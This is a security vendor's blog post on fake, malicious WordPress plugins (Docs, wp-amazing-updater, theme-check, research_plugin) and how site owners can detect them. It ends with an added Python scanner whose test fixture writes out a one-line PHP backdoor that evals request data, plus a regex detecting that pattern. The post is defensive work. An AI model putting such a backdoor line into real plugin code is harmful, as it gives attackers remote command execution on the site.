Fake, malicious WordPress plugins are not new. The proliferation of fake plugins generating spam files though has blossomed in recent months. We’ve seen blatant rip offs of existing plugins, fake plugins that are one letter away from their legitimate counterpart, and even a created-from-scratch, malware-serving plugin using a ripped version of the WordPress.org plugins site.
This week we’ll discuss how fake plugins get on to WordPress sites, analyze a well known fake plugin to provide a sense of what they can do, look at a non-exhaustive list of fake plugins and a couple of interesting features, and discuss ways to avoid being victimized by fake plugins.
Unfortunately there's no single way fake plugins end up on WordPress sites. We can, however, discuss a few common ways they are "installed." The first method is just that: a fake plugin is installed by the site owner.
Malicious plugin authors are adept and persistent. Bad actors will co-opt existing, usually not well-known plugins, steal the code and post the plugin on any number of third-party WordPress sites. Unsuspecting site owners looking for some capability find the fake, malicious plugin, install it, and the new capability may or may not work. What is likely to work is the malicious code inside the fake plugin.
The most likely way a fake plugin makes it on to a WordPress site is through the compromise of an existing, vulnerable plugin. The Revolution Slider vulnerability was a major and long-lasting battle with compromised WordPress sites and the resultant spam.
Another method fake plugins are installed is an FTP or hosting control panel credentials compromise. A compromised workstation is a password stealing trojan away from transmitting sensitive user names and passwords to bad actors who may take complete control of a site and install any number of types of malware, including fake plugins.
We'll begin our fake plugin survey with one of the most infamous fake WordPress plugins, the 'Docs' plugin. Docs (occasionally lowercase docs) is a spam file creator that generates hundreds, if not thousands, of .dat spam files. It places them in a directory named cache and maps the files with a file called sitemap.html. Here you can see the code that does just that.
Docs.php Code Snippet
And here is a partial directory listing of the generated spam files.
Docs Spam Files
The spam files themselves, in this example, contain links pushing drug rehab.
<li><a href="http://example.com/recovering-drug-addict-behavior">Recovering drug addict behavior</a></li>
<li><a href="http://example.com/recovery-from-pain-killer-addiction">Recovery from pain killer addiction</a></li>
<li><a href="http://example.com/drug-rehabilitation-near-me">Drug rehabilitation near me</a></li>
<li><a href="http://example.com/pcp-drug-treatment">Pcp drug treatment</a></li>
<li><a href="http://example.com/celebrities-in-recovery">Celebrities in recovery</a></li>
.dat File Snippet
This spam will become an easy source of black hat SEO for the bad actors, boosting other sites’ rankings while hurting the SEO of the infected site — even causing the attacked site to become blacklisted by search engines.
Here is a non-exhaustive list of plugins we’ve seen while dealing with infected WordPress sites.
Sample Listing of Fake WordPress Plugins
A common tactic of fake plugins is to use legitimate comments or code to try to mask their existence. Take wp-amazing-updater for example. Wp-amazing-updater is a fake plugin that is a password-protected uploader and more, and it uses the comments from the BNS Add Widget plugin in its main PHP file. Here are the fake plugin's directory listing and the legitimate comments in the malicious plugin file.
Directory Listing of wp-amazing-updater
Benign Comments in the Malicious wp-amazing-updater.php File
Another fake plugin, theme-check, uses a barely obfuscated shell, the WSO shell, in its included file, db.php. Here is a snippet of the shell’s code.
Snippet of plugins/theme-check/db.php
Some fake plugins are overwhelmingly normal code while others are overwhelmingly malicious. Still others co-opt legitimate parts of a platform, here WordPress, to deliver the functions used to exploit a site. The code below is from the 'research_plugin', which provides a simple-to-access backdoor. The function research_plugin(), which evals request data to run arbitrary commands, is called whenever the theme is initialized, via the add_action hook.
Snippet of ‘research_plugin’
It can be difficult to detect fake, malicious plugins installed on a WordPress site, especially if you don’t know what you’re looking for. The best thing a site owner or developer can do is regularly check the installed plugins through the WordPress admin dashboard, and look through the installation files directly in /wp-content/plugins with an FTP client or hosting control panel. Look for any plugins listed above or any that you do not recognize, and then check wordpress.org/plugins to search for the plugin’s directory name to verify if it’s legitimate.
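As an added example (not SiteLock's code or any tool from the post), the script below turns the indicators described above into a small offline scanner for a wp-content/plugins tree: a directory holding a pile of .dat files next to a sitemap.html (the Docs pattern), a PHP file that feeds request data into eval (the research_plugin pattern), a plugin directory whose main file carries another plugin's header or none at all (wp-amazing-updater borrowing BNS Add Widget's comments), and a tally of the hosts the spam files link to. The plugin tree it scans is a constructed fixture built in a temporary directory; the threshold of five .dat files and the header-matching heuristic are assumptions, not something the post specifies.

```python
import os
import re
import tempfile
from collections import Counter
from pathlib import Path
from urllib.parse import urlparse

# Constructed fixture: a miniature wp-content/plugins tree that reproduces the
# indicators described in the post. None of this is real plugin code.
SAMPLE_TREE = {
    "akismet/akismet.php": "<?php\n/*\nPlugin Name: Akismet Anti-Spam\n*/\n",
    "docs/docs.php": "<?php\n/*\nPlugin Name: Docs\n*/\n",
    "docs/cache/sitemap.html": '<ul><li><a href="spam0.dat">spam0</a></li></ul>\n',
    "wp-amazing-updater/wp-amazing-updater.php":
        "<?php\n/*\nPlugin Name: BNS Add Widget\n*/\n",
    "research_plugin/research_plugin.php":
        "<?php\nfunction research_plugin() { eval( $_REQUEST['q'] ); }\n"
        "add_action('init', 'research_plugin');\n",
}
SPAM_LINK = '<li><a href="http://example.com/page-{n}">Page {n}</a></li>\n'
for n in range(12):  # Docs writes hundreds of these; a dozen is enough here
    SAMPLE_TREE[f"docs/cache/spam{n}.dat"] = SPAM_LINK.format(n=n)

DAT_THRESHOLD = 5  # assumed cut-off for "a pile of .dat files"
# eval() fed, directly or through base64_decode(), from a request superglobal
EVAL_INPUT = re.compile(
    r"eval\s*\(\s*(?:base64_decode\s*\(\s*)?\$_(?:REQUEST|POST|GET|COOKIE)\b")
HEADER = re.compile(r"Plugin Name:\s*(.+)")


def build_sample_tree():
    """Write the constructed fixture to a temp dir and return its path."""
    root = Path(tempfile.mkdtemp(prefix="plugins-"))
    for rel, body in SAMPLE_TREE.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body)
    return root


def find_spam_caches(root):
    """Directories holding many .dat files plus a sitemap.html (Docs pattern)."""
    hits = []
    for d, _, files in os.walk(root):
        dats = sum(f.endswith(".dat") for f in files)
        if dats >= DAT_THRESHOLD and "sitemap.html" in files:
            hits.append(Path(d).relative_to(root).as_posix())
    return sorted(hits)


def find_eval_on_input(root):
    """PHP files that eval request data (research_plugin pattern)."""
    return sorted(p.relative_to(root).as_posix() for p in Path(root).rglob("*.php")
                  if EVAL_INPUT.search(p.read_text(errors="ignore")))


def _tokens(s):
    # Meaningful words of a slug or plugin name; "wp" carries no information.
    return {t for t in re.split(r"[^a-z0-9]+", s.lower()) if len(t) > 2 and t != "wp"}


def find_header_mismatch(root):
    """Plugin dirs whose main file has no header or declares another plugin's name.
    Heuristic: flag when no word of the directory name appears in 'Plugin Name'."""
    hits = []
    for d in sorted(p for p in Path(root).iterdir() if p.is_dir()):
        main = d / f"{d.name}.php"
        match = HEADER.search(main.read_text(errors="ignore")) if main.exists() else None
        if not match or not (_tokens(d.name) & _tokens(match.group(1))):
            hits.append(d.name)
    return hits


def spam_domains(root):
    """Hosts linked from the generated .dat files, i.e. who the black hat SEO serves."""
    counts = Counter()
    for p in Path(root).rglob("*.dat"):
        for href in re.findall(r'href="([^"]+)"', p.read_text(errors="ignore")):
            host = urlparse(href).hostname
            if host:
                counts[host] += 1
    return counts


def scan(root):
    """Run every check against a plugins directory and collect the findings."""
    return {
        "spam_caches": find_spam_caches(root),
        "eval_on_input": find_eval_on_input(root),
        "header_mismatch": find_header_mismatch(root),
        "spam_domains": spam_domains(root),
    }


if __name__ == "__main__":
    for name, finding in scan(build_sample_tree()).items():
        print(f"{name}: {finding}")
```

To run it against a real site, call scan() on the path of wp-content/plugins instead of the fixture. The header check is deliberately loose so a directory such as akismet with a header of "Akismet Anti-Spam" is not reported; anything it does flag still needs a human to look at the files and search wordpress.org/plugins for the directory name, as the post recommends.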
Using a security scanner, like the SiteLock INFINITY malware scanner, can also monitor your site for the malware contained in fake plugins, alert you to the plugins and, in the case of INFINITY, automatically clean the malicious content for you.
© Copyright 2017, SiteLock LLC.